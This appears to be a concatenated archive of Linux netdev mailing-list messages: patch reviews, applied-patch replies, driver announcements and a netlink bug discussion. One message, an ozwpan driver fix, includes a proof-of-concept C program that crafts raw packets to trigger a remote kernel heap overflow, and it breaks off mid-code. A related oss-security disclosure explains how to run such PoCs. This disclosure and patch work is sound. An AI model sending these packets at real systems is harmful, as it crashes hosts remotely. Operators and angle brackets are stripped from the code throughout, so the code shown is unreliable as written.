Re: [PATCH -next] net: sched: use counter to break reclassify loops
Jamal Hadi Salim j...@mojatatu.com wrote: On 05/12/15 09:00, Florian Westphal wrote: Jamal Hadi Salim j...@mojatatu.com wrote: Florian, In general i am in support of removing this - since the use case never materialized as being useful. However, this is not the same logic that was there before. To get equivalency you need to pass the limit into tc_classify_compat() so i can be reset. AFAICS this re-set only happens when we return something other than RECLASSIFY which means the caller will not check the limit. So in fact it should be ok to remove this since the counter will always start from 0 on next tc_classify() invocation. Florian, consider the following scenario: Assume X is the max allowed reclassified before bells start ringing. If we see upto X back-to-back reclassify - we are very much likely in a loop. We should see fire trucks arrive and bail out. If we see X-1 reclassify followed by a pipe followed by X-1 reclassify followed by ok then that looks like a healthy policy. But that is a a total of 2X-2 reclassifies. You will bail out at X reclassifies; what i am saying is you shouldnt. And existing logic doesnt. Does that make sense? Yes, but, if we use your example above then: tc_classify called limit 0 tc_classify_compat called, ret RECLASSIFY limit 1 tc_classify_compat called, ret RECLASSIFY limit 2 tc_classify_compat called, ret PIPE (== 3) tc_classify returns 3 tc_classify called limit 0 ... So we don't toss skb since any return value other than RECLASSIFY will make tc_classify() return to its caller, and when caller invokes tc_classify again the limit variable is set to 0 again. Does that make sense to you? Thanks Jamal. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: gone with the spring cleanup..
On 05/13/2015 12:55 PM, Or Gerlitz wrote: On 5/13/2015 1:42 PM, Jiri Pirko wrote: Looks like the problem might be in named structures which suppose to be anonymous. Would you try following patch: oh, switchdev_obj_vlan and switchdev_obj_ipv4_fib is used in rocker.. So better: nope, fails.. if I remove the union (it is struct switchdev_obj has strict vlan and ipv4_fib fields) it works. Seems there's some problem also with anonymous unions. Yes, we once had such an issue here btw: https://git.kernel.org/cgit/linux/kernel/git/davem/net-next.git/commit/lib/test_bpf.c?id=ece80490e2c1cefda018b2e5b96d4f39083d9096 -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH iproute2] man ip-link: Remove extra GROUP explanation
From: Vadim Kochan vadi...@gmail.com Remove double explanation of GROUP option from 'ip link set' section. Signed-off-by: Vadim Kochan vadi...@gmail.com --- man/man8/ip-link.8.in | 8 +--- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/man/man8/ip-link.8.in b/man/man8/ip-link.8.in index 823246f..714aab4 100644 --- a/man/man8/ip-link.8.in +++ b/man/man8/ip-link.8.in @@ -714,12 +714,6 @@ tool can be used. But it allows to change network namespace only for physical de give the device a symbolic name for easy reference. .TP -.BI group GROUP -specify the group the device belongs to. -The available groups are listed in file -.BR @SYSCONFDIR@/group . - -.TP .BI vf NUM specify a Virtual Function device to be configured. The associated PF device must be specified using the @@ -867,7 +861,7 @@ specifies which help of link type to dislpay. .SS .I GROUP may be a number or a string from the file -.B /etc/iproute2/group +.B @SYSCONFDIR@/group which can be manually filled. .SH EXAMPLES -- 2.3.1 -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next] tcp/dccp: tw_timer_handler() is static
From: Eric Dumazet eric.duma...@gmail.com Date: Tue, 12 May 2015 06:22:56 -0700 From: Eric Dumazet eduma...@google.com tw_timer_handler() is only used from net/ipv4/inet_timewait_sock.c Fixes: 789f558cfb36 (tcp/dccp: get rid of central timewait timer) Signed-off-by: Eric Dumazet eduma...@google.com Applied. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next] ipv4: __ip_local_out_sk() is static
From: Eric Dumazet eric.duma...@gmail.com Date: Tue, 12 May 2015 06:31:48 -0700 From: Eric Dumazet eduma...@google.com __ip_local_out_sk() is only used from net/ipv4/ip_output.c net/ipv4/ip_output.c:94:5: warning: symbol '__ip_local_out_sk' was not declared. Should it be static? Fixes: 7026b1ddb6b8 (netfilter: Pass socket pointer down through okfn().) Signed-off-by: Eric Dumazet eduma...@google.com Applied. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure
From: Tom Herbert t...@herbertland.com Date: Tue, 12 May 2015 08:22:58 -0700 @@ -15,6 +15,13 @@ * All the members, except thoff, are in network byte order. */ struct flow_keys { + u16 thoff; + u16 padding1; +#define FLOW_KEYS_HASH_START_FIELD n_proto + __be16 n_proto; + u8 ip_proto; + u8 padding; + This padding works if everyone consistently zero initializes the whole key structure, but for whatever reason (performance, unintentional oversight, etc.) not all paths do. So, for example, inet_set_txhash() is going to have random crap in keys.padding, so the hashes computed are not stable for a given flow key tuple. That's just the first code path I found with this issue, there are probably several others. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH 1/4] ozwpan: Use proper check to prevent heap overflow
Since elt-length is a u8, we can make this variable a u8. Then we can do proper bounds checking more easily. Without this, a potentially negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, resulting in a remotely exploitable heap overflow with network supplied data. This could result in remote code execution. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include arpa/inet.h #include linux/if_packet.h #include net/if.h #include netinet/ether.h #include stdio.h #include string.h #include stdlib.h #include endian.h #include sys/ioctl.h #include sys/socket.h #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include ozprotocol.h static int hex2num(char c) { if (c = '0' c = '9') return c - '0'; if (c = 'a' c = 'f') return c - 'a' + 10; if (c = 'A' c = 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i 6; i++) { int a, b; a = hex2num(*txt++); if (a 0) return -1; b = hex2num(*txt++); if (b 0) return -1; *addr++ = (a 4) | b; if (i 5 *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc 3) { fprintf(stderr, Usage: %s interface destination_mac\n, argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, Invalid mac address.\n); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd 0) { perror(socket); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, if_idx) 0) { perror(SIOCGIFINDEX); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, if_idx) 0) { perror(SIOCGIFHWADDR); return 1; } uint8_t *src_mac = (uint8_t *)if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type =
Re: [oss-security] [PATCH 0/4] ozwpan: Four remote packet-of-death vulnerabilities
On Wed, May 13, 2015 at 08:33:30PM +0200, Jason A. Donenfeld wrote: The ozwpan driver accepts network packets, parses them, and converts them into various USB functionality. There are numerous security vulnerabilities in the handling of these packets. Two of them result in a memcpy(kernel_buffer, network_packet, -length), one of them is a divide-by-zero, and one of them is a loop that decrements -1 until it's zero. I've written a very simple proof-of-concept for each one of these vulnerabilities to aid with detecting and fixing them. The general operation of each proof-of-concept code is: - Load the module with: # insmod ozwpan.ko g_net_dev=eth0 - Compile the PoC with ozprotocol.h from the kernel tree: $ cp /path/to/linux/drivers/staging/ozwpan/ozprotocol.h ./ $ gcc ./poc.c -o ./poc - Run the PoC: # ./poc eth0 [mac-address] These PoCs should also be useful to the maintainers for testing out constructing and sending various other types of malformed packets against which this driver should be hardened. Please assign CVEs for these vulnerabilities. I believe the first two patches of this set can receive one CVE for both, and the remaining two can receive one CVE each. On a slightly related note, there are several other vulnerabilities in this driver that are worth looking into. When ozwpan receives a packet, it casts the packet into a variety of different structs, based on the value of type and length parameters inside the packet. When making these casts, and when reading bytes based on this length parameter, the actual length of the packet in the socket buffer is never actually consulted. As such, it's very likely that a packet could be sent that results in the kernel reading memory in adjacent buffers, resulting in an information leak, or from unpaged addresses, resulting in a crash. In the former case, it may be possible with certain message types to actually send these leaked adjacent bytes back to the sender of the packet. So, I'd highly recommend the maintainers of this driver go branch-by-branch from the initial rx function, adding checks to ensure all reads and casts are within the bounds of the socket buffer. Jason A. Donenfeld (4): ozwpan: Use proper check to prevent heap overflow ozwpan: Use unsigned ints to prevent heap overflow ozwpan: divide-by-zero leading to panic ozwpan: unchecked signed subtraction leads to DoS drivers/staging/ozwpan/ozhcd.c | 8 drivers/staging/ozwpan/ozusbif.h | 4 ++-- drivers/staging/ozwpan/ozusbsvc1.c | 11 +-- 3 files changed, 15 insertions(+), 8 deletions(-) Any reason you didn't cc: the maintainer who could actually apply these to the kernel tree? Please use scripts/get_maintainer.pl to properly notify the correct people. thanks, greg k-h -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [patch -next] net: macb: OR vs AND typos
From: Dan Carpenter dan.carpen...@oracle.com Date: Tue, 12 May 2015 21:15:24 +0300 The bitwise tests are always true here because it uses '|' where '' is intended. Fixes: 98b5a0f4a228 ('net: macb: Add support for jumbo frames') Signed-off-by: Dan Carpenter dan.carpen...@oracle.com Applied, thanks. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH -next] net: sched: use counter to break reclassify loops
From: Florian Westphal f...@strlen.de Date: Mon, 11 May 2015 19:50:41 +0200 Seems all we want here is to avoid endless 'goto reclassify' loop. tc_classify_compat even resets this counter when something other than TC_ACT_RECLASSIFY is returned, so this skb-counter doesn't break hypothetical loops induced by something other than perpetual TC_ACT_RECLASSIFY return values. skb_act_clone is now identical to skb_clone, so just use that. Tested with following (bogus) filter: tc filter add dev eth0 parent : \ protocol ip u32 match u32 0 0 police rate 10Kbit burst \ 64000 mtu 1500 action reclassify Acked-by: Daniel Borkmann dan...@iogearbox.net Signed-off-by: Florian Westphal f...@strlen.de Applied, thanks everyone. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next,1/1] hv_netvsc: use per_cpu stats to calculate TX/RX data
From: six...@microsoft.com Date: Tue, 12 May 2015 15:50:02 -0700 From: Simon Xiao six...@microsoft.com Current code does not lock anything when calculating the TX and RX stats. As a result, the RX and TX data reported by ifconfig are not accuracy in a system with high network throughput and multiple CPUs (in my test, RX/TX = 83% between 2 HyperV VM nodes which have 8 vCPUs and 40G Ethernet). This patch fixed the above issue by using per_cpu stats. netvsc_get_stats64() summarizes TX and RX data by iterating over all CPUs to get their respective stats. Signed-off-by: Simon Xiao six...@microsoft.com Reviewed-by: K. Y. Srinivasan k...@microsoft.com Reviewed-by: Haiyang Zhang haiya...@microsoft.com --- drivers/net/hyperv/hyperv_net.h | 9 + drivers/net/hyperv/netvsc_drv.c | 80 - 2 files changed, 81 insertions(+), 8 deletions(-) diff --git a/drivers/net/hyperv/hyperv_net.h b/drivers/net/hyperv/hyperv_net.h index 41071d3..5a92b36 100644 --- a/drivers/net/hyperv/hyperv_net.h +++ b/drivers/net/hyperv/hyperv_net.h @@ -611,6 +611,12 @@ struct multi_send_data { u32 count; /* counter of batched packets */ }; +struct netvsc_stats { + u64 packets; + u64 bytes; + struct u64_stats_sync s_sync; +}; + /* The context of the netvsc device */ struct net_device_context { /* point back to our device context */ @@ -618,6 +624,9 @@ struct net_device_context { struct delayed_work dwork; struct work_struct work; u32 msg_enable; /* debug level */ + + struct netvsc_stats __percpu *tx_stats; + struct netvsc_stats __percpu *rx_stats; }; /* Per netvsc device */ diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c index 5993c7e..310b902 100644 --- a/drivers/net/hyperv/netvsc_drv.c +++ b/drivers/net/hyperv/netvsc_drv.c @@ -391,7 +391,7 @@ static int netvsc_start_xmit(struct sk_buff *skb, struct net_device *net) u32 skb_length; u32 pkt_sz; struct hv_page_buffer page_buf[MAX_PAGE_BUFFER_COUNT]; - + struct netvsc_stats *tx_stats = this_cpu_ptr(net_device_ctx-tx_stats); /* We will atmost need two pages to describe the rndis * header. We can only transmit MAX_PAGE_BUFFER_COUNT number @@ -580,8 +580,10 @@ do_send: drop: if (ret == 0) { - net-stats.tx_bytes += skb_length; - net-stats.tx_packets++; + u64_stats_update_begin(tx_stats-s_sync); + tx_stats-packets++; + tx_stats-bytes += skb_length; + u64_stats_update_end(tx_stats-s_sync); } else { if (ret != -EAGAIN) { dev_kfree_skb_any(skb); @@ -644,13 +646,17 @@ int netvsc_recv_callback(struct hv_device *device_obj, struct ndis_tcp_ip_checksum_info *csum_info) { struct net_device *net; + struct net_device_context *net_device_ctx; struct sk_buff *skb; + struct netvsc_stats *rx_stats; net = ((struct netvsc_device *)hv_get_drvdata(device_obj))-ndev; if (!net || net-reg_state != NETREG_REGISTERED) { packet-status = NVSP_STAT_FAIL; return 0; } + net_device_ctx = netdev_priv(net); + rx_stats = this_cpu_ptr(net_device_ctx-rx_stats); /* Allocate a skb - TODO direct I/O to pages? */ skb = netdev_alloc_skb_ip_align(net, packet-total_data_buflen); @@ -686,8 +692,10 @@ int netvsc_recv_callback(struct hv_device *device_obj, skb_record_rx_queue(skb, packet-channel- offermsg.offer.sub_channel_index); - net-stats.rx_packets++; - net-stats.rx_bytes += packet-total_data_buflen; + u64_stats_update_begin(rx_stats-s_sync); + rx_stats-packets++; + rx_stats-bytes += packet-total_data_buflen; + u64_stats_update_end(rx_stats-s_sync); /* * Pass the skb back up. Network stack will deallocate the skb when it @@ -753,6 +761,46 @@ static int netvsc_change_mtu(struct net_device *ndev, int mtu) return 0; } +static struct rtnl_link_stats64 *netvsc_get_stats64(struct net_device *net, + struct rtnl_link_stats64 *t) +{ + struct net_device_context *ndev_ctx = netdev_priv(net); + int cpu; + + for_each_possible_cpu(cpu) { + struct netvsc_stats *tx_stats = per_cpu_ptr(ndev_ctx-tx_stats, + cpu); + struct netvsc_stats *rx_stats = per_cpu_ptr(ndev_ctx-rx_stats, + cpu); + u64 tx_packets, tx_bytes, rx_packets, rx_bytes; + unsigned int start; + + do { + start = u64_stats_fetch_begin_irq(tx_stats-s_sync); + tx_packets = tx_stats-packets; +
Re: [PATCH] vlan: Correctly propagate promisc|allmulti flags in notifier.
From: Vladislav Yasevich vyasev...@gmail.com Date: Tue, 12 May 2015 20:53:14 -0400 Currently vlan notifier handler will try to update all vlans for a device when that device comes up. A problem occurs, however, when the vlan device was set to promiscuous, but not by the user (ex: a bridge). In that case, dev-gflags are not updated. What results is that the lower device ends up with an extra promiscuity count. Here are the backtraces that prove this: ... The above comes from the setting the vlan device to IFF_UP state. ... And this one comes from the notification code. What we end up with is a vlan with promiscuity count of 1 and and a physical device with a promiscuity count of 2. They should both have a count 1. To resolve this issue, vlan code can use dev_get_flags() api which correctly masks promiscuity and allmulti flags. Applied, thanks Vlad. Sign-off-by: Vlad Yasevich vyase...@redhat.com Note, it's Signed-off-by: not Sign-off-by: I fixed this for you. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH 0/5 net-next] Netfilter ingress support (v4)
From: Pablo Neira Ayuso pa...@netfilter.org Date: Wed, 13 May 2015 18:19:33 +0200 This is the v4 round of patches to add the Netfilter ingress hook, it basically comes in two steps: ... Please, apply. Thanks. Series applied, thanks Pablo. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH 5/5] netfilter: add netfilter ingress hook after handle_ing() under unique static key
From: Nicolas Dichtel nicolas.dich...@6wind.com Date: Wed, 13 May 2015 21:36:25 +0200 Le 13/05/2015 18:19, Pablo Neira Ayuso a écrit : [snip] --- /dev/null +++ b/include/linux/netfilter_ingress.h [snip] +static inline void nf_hook_ingress_init(struct net_device *dev) +{ +INIT_LIST_HEAD(dev-nf_hooks_ingress); nit: this line is indented with spaces instead of a tab. I took care of this when I applied Pablo's series. Thanks. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next v2 0/2] sfc: Bowdlerise PTP MCDI errors
From: Edward Cree ec...@solarflare.com Date: Tue, 12 May 2015 13:03:27 +0100 When the NIC doesn't support PTP, probe-time MCDI commands fail in predictable ways. Instead of logging cryptic MCDI errors, just log that PTP isn't supported. v2: Hopefully stop Thunderbird mangling the patches. Series applied, thanks. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next] net: kill useless net_*_ingress_queue() definitions when NET_CLS_ACT is unset
From: Pablo Neira Ayuso pa...@netfilter.org Date: Tue, 12 May 2015 20:28:07 +0200 This fixes 4577139b2dabf589 (net: use jump label patching for ingress qdisc in __netif_receive_skb_core). The only client of this is sch_ingress and it depends on NET_CLS_ACT. So there is no way these definition can be of any help. Cc: Daniel Borkmann dan...@iogearbox.net Signed-off-by: Pablo Neira Ayuso pa...@netfilter.org Applied, thanks Pablo. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH v3] add GENEVE netdev tunnel driver
From: John W. Linville linvi...@tuxdriver.com Date: Wed, 13 May 2015 12:57:25 -0400 This 5-patch kernel series adds a netdev implementation of a GENEVE tunnel driver, and the single iproute2 patch enables creation and such for those netdevs. This makes use of the existing GENEVE infrastructure already used by the OVS code. The net/ipv4/geneve.c file is renamed as net/ipv4/geneve_core.c as part of these changes. ... The overall structure of the GENEVE netdev driver is strongly influenced by the VXLAN netdev driver. This is not surprising, as the two drivers are intended to serve similar purposes. As development of the GENEVE driver continues, it is likely that those similarities will grow stronger. This will include both simple configuration options (e.g. TOS and TTL settings) and new control plane support. The current implementation is very simple, restricting itself to point to point links over IPv4. This is due only to the simplicity of the implementation, and no such limit is inherent to GENEVE in any way. Support for IPv6 links and more sophisticated control plane options are predictable enhancements. Using the included iproute2 patch, a GENEVE tunnel is created thusly: ip link add dev gnv0 type geneve remote 192.168.22.1 vni 1234 ip link set gnv0 up ip addr add 10.1.1.1/24 dev gnv0 After a corresponding tunnel interface is created at the link partner, traffic should proceed as expected. Please let me know if anyone has problems...thanks! Looks good, series applied, thanks John! -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net 1/2] ipv6: do not delete previously existing ECMP routes if add fails
On Wed, May 13, 2015 at 06:30:20AM -0700, roopa wrote: This looks like a similar bug i was trying to fix some time back: http://patchwork.ozlabs.org/patch/362296/ (I am not sure if my full patch is still valid. I was thinking of re-spining it sometime soon. If you are interested in trying it out, please do) It's essentially the same idea but I prefer to use variable remaining which is already there and is needed anyway rather than introduce three extra variables for the cleanup (which is quite similar to the suggestion from Hannes' reply). I've sent v2 few minutes ago. Michal Kubecek -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower
From: Jiri Pirko j...@resnulli.us Date: Tue, 12 May 2015 14:56:06 +0200 Per Davem's request, I prepared this patchset which introduces programmable flow dissector. For current users of flow_keys, there is a wrapper skb_flow_dissect_flow_keys which maintains the previous behaviour. For purposes of cls_flower, couple of new dissection keys were introduced. Note that this dissector can be also eventually used by openvswitch code. Also, as a next step, I plan to get rid of *skb_flow_get_ports(export) and *__skb_get_poff as their functionality can be now implemented by skb_flow_dissect as well. v2-v3: - remove TCA_FLOWER_POLICE attr suggested by Jamal v1-v2: - move __skb_tx_hash rather to dev.c as suggested by Alex Ok, assuming this passes all of my build tests, I'll push this into net-next. I'm sure there will be some performance improvements possible, and I hope you will look into making sure this new programmable classifier is as light weight as possible. Anyways, thanks a lot. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next v3 0/6] refine rollover
From: Willem de Bruijn will...@google.com Date: Tue, 12 May 2015 11:56:44 -0400 From: Willem de Bruijn will...@google.com refine packet socket rollover: 1. mitigate a case of lock contention 2. avoid exporting resource exhaustion to other sockets, by migrating only to a victim socket that has ample room 3. avoid reordering of most flows on the socket, by migrating first the flow responsible for load imbalance 4. help processes detect load imbalance, by exporting rollover counters Context: rollover implements flow migration in packet socket fanout groups in case of extreme load imbalance. It is a specific implementation of migration that minimizes reordering by selecting the same victim socket when possible (and by selecting subsequent victims in a round robin fashion, from which its name derives). The user API looks a lot better now, series applied, thanks Willem. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [net-next PATCH] net: Reserve skb headroom and set skb-dev even if using __alloc_skb
From: Alexander Duyck alexander.h.du...@redhat.com Date: Wed, 13 May 2015 13:34:13 -0700 When I had inlined __alloc_rx_skb into __netdev_alloc_skb and __napi_alloc_skb I had overlooked the fact that there was a return in the __alloc_rx_skb. As a result we weren't reserving headroom or setting the skb-dev in certain cases. This change corrects that by adding a couple of jump labels to jump to depending on __alloc_skb either succeeding or failing. Fixes: 9451980a6646 (net: Use cached copy of pfmemalloc to avoid accessing page) Reported-by: Felipe Balbi ba...@ti.com Signed-off-by: Alexander Duyck alexander.h.du...@redhat.com Applied, thanks. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[RFC PATCH 0/4] Make iSCSI network namespace aware
I've had a few reports of people trying to run iscsid in a container, which doesn't work at all when using network namespaces. This is the start of me looking at what it would take to make that work, and if it makes sense at all. The first issue is that the kernel side of the iSCSI netlink control protocol only operates in the initial network namespace. But beyond that, if we allow iSCSI to be managed within a namespace we need to decide what that means. I think it makes the most sense to isolate the iSCSI host, along with it's associated endpoints, connections, and sessions, to a network namespace and allow multiple instances of the userspace tools to exist in separate namespaces managing separate hosts. It works well for iscsi_tcp, which creates a host per session. There's no attempt to manage sessions on offloading hosts independently, although future work could include the ability to move an entire host to a new namespace like is supported for network devices. This is only about the structures and functionality involved in maintaining the iSCSI session, the SCSI host along with it's discovered targets and devices has no association with network namespaces. These patches are functional, but not complete. There's no isolation enforced in the kernel just yet, so it relies on well behaved userspace. I plan on fixing that, but wanted some feedback on the idea and approach so far. Thanks, Chris Chris Leech (4): iscsi: create per-net iscsi nl kernel sockets iscsi: sysfs filtering by network namespace iscsi: make all netlink multicast namespace aware iscsi: set netns for iscsi_tcp hosts drivers/scsi/iscsi_tcp.c| 7 + drivers/scsi/scsi_transport_iscsi.c | 264 +--- include/scsi/scsi_transport_iscsi.h | 2 + 3 files changed, 222 insertions(+), 51 deletions(-) -- 2.1.0 -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[RFC PATCH 4/4] iscsi: set netns for iscsi_tcp hosts
This lets iscsi_tcp operate in multiple namespaces. It uses current during session creation to find the net namespace, but it might be better to manage to pass it along from the iscsi netlink socket. --- drivers/scsi/iscsi_tcp.c| 7 +++ drivers/scsi/scsi_transport_iscsi.c | 7 ++- include/scsi/scsi_transport_iscsi.h | 1 + 3 files changed, 14 insertions(+), 1 deletion(-) diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c index 0b8af18..ebe99da 100644 --- a/drivers/scsi/iscsi_tcp.c +++ b/drivers/scsi/iscsi_tcp.c @@ -948,6 +948,11 @@ static int iscsi_sw_tcp_slave_configure(struct scsi_device *sdev) return 0; } +static struct net *iscsi_sw_tcp_netns(struct Scsi_Host *shost) +{ + return current-nsproxy-net_ns; +} + static struct scsi_host_template iscsi_sw_tcp_sht = { .module = THIS_MODULE, .name = iSCSI Initiator over TCP/IP, @@ -1003,6 +1008,8 @@ static struct iscsi_transport iscsi_sw_tcp_transport = { .alloc_pdu = iscsi_sw_tcp_pdu_alloc, /* recovery */ .session_recovery_timedout = iscsi_session_recovery_timedout, + /* net namespace */ + .get_netns = iscsi_sw_tcp_netns, }; static int __init iscsi_sw_tcp_init(void) diff --git a/drivers/scsi/scsi_transport_iscsi.c b/drivers/scsi/scsi_transport_iscsi.c index 4fdd4bf..791aacd 100644 --- a/drivers/scsi/scsi_transport_iscsi.c +++ b/drivers/scsi/scsi_transport_iscsi.c @@ -1590,11 +1590,16 @@ static int iscsi_setup_host(struct transport_container *tc, struct device *dev, { struct Scsi_Host *shost = dev_to_shost(dev); struct iscsi_cls_host *ihost = shost-shost_data; + struct iscsi_internal *priv = to_iscsi_internal(shost-transportt); + struct iscsi_transport *transport = priv-iscsi_transport; memset(ihost, 0, sizeof(*ihost)); atomic_set(ihost-nr_scans, 0); mutex_init(ihost-mutex); - ihost-netns = init_net; + if (transport-get_netns) + ihost-netns = transport-get_netns(shost); + else + ihost-netns = init_net; iscsi_bsg_host_add(shost, ihost); /* ignore any bsg add error - we just can't do sgio */ diff --git a/include/scsi/scsi_transport_iscsi.h b/include/scsi/scsi_transport_iscsi.h index 860ac0c..878bcf2 100644 --- a/include/scsi/scsi_transport_iscsi.h +++ b/include/scsi/scsi_transport_iscsi.h @@ -168,6 +168,7 @@ struct iscsi_transport { int (*logout_flashnode_sid) (struct iscsi_cls_session *cls_sess); int (*get_host_stats) (struct Scsi_Host *shost, char *buf, int len); u8 (*check_protection)(struct iscsi_task *task, sector_t *sector); + struct net *(*get_netns)(struct Scsi_Host *shost); }; /* -- 2.1.0 -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH v5] macvtap add missing ioctls
From: Justin Cormack jus...@myriabit.com Date: Wed, 13 May 2015 12:35:16 +0100 The macvtap driver tries to emulate all the ioctls supported by a normal tun/tap driver, however it was missing the generic SIOCGIFHWADDR and SIOCSIFHWADDR ioctls to get and set the mac address that are supported by tun/tap. This patch adds these. Signed-off-by: Justin Cormack jus...@netbsd.org As I stated, you cannot just send a new version of a patch I already applied to my tree. It is in the permanent GIT commit record, and cannot be removed. Therefore, you must send a relative fix. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: netlink rhashtable status
From: Eric Dumazet eric.duma...@gmail.com Date: Wed, 13 May 2015 09:18:04 -0700 On Wed, 2015-05-13 at 06:04 -0700, Eric Dumazet wrote: On Wed, 2015-05-13 at 14:20 +0800, Herbert Xu wrote: On Tue, May 12, 2015 at 11:15:40PM -0700, Eric Dumazet wrote: Trick is to start about 200 threads using getaddrinfo() When it loses the kernel socket, is it permanent or intermittent? I'm trying to figure out whether it's the hashtable reader missing an entry that's there or whether the hashtable has been corrupted and an entry is gone forever. Cheers, This is permanent. We have to reboot the host. For 4.0.3 I replaced the two rhashtable files by current Linus version, and problem is gone, so the fix is not in net/netlink include/linux/rhashtable.h | 10 lib/rhashtable.c | 582 --- 2 files changed, 215 insertions(+), 377 deletions(-) I did a bisection but ended to 393619474ec0 rhashtable: Fix read-side crash during rehash And simply backporting it does not solve the problem Backporting all of the rhashtable bits is going to be really painful and potentially quite risky. However, if someone is confident enough, I'm willing to entertain this idea. Alternatively, we could consider reverting the rhashtable conversion of netlink in the interim. It might be the safest solution for -stable. -- To unsubscribe from this list: send the line 